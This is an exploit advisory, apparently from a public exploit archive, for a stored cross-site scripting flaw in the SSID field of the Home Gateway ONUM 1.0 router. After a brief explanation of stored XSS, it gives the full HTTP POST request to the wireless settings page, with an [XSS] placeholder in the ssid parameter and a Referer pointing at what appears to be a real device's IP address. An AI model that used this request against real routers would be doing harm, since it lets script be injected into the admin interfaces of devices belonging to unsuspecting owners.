#Exploit Title: Home Gateway ONUM 1.0 - Cross-Site Scripting
#Date: 2019-01-15
#Exploit Author: SajjadBnz
#My Email: blackwolf@post.com
#Device Name: ONU1GERW
#Model ID: 150R
#Hardware Version: V1.0
#Software Version: V2.1.2_X000
#Serial Number: 1709000455
#Build Information: uild.0454.170914
[+] Overview:
=============
Stored XSS in SSID Field-
Stored XSS Attacks
Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type-I XSS.
[+] Headers:
=============
POST: /net_wlan_basic_user_11n.asp
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://117.212.241.74/net_wlan_basic_user_11n.asp
Content-Type: application/x-www-form-urlencoded
Content-Length: 183
Connection: keep-alive
Upgrade-Insecure-Requests: 1
POST DATA : wlanEnabled=ON&select_2g5g=on&band=10&ssid=[XSS]&chanwid=2&chan=0&txRate=0&txpower=0&shortGI0=off&wmm=on&submit-url=/net_wlan_basic_11n.asp&wlan_idx=0&basicrates=496&operrates=4095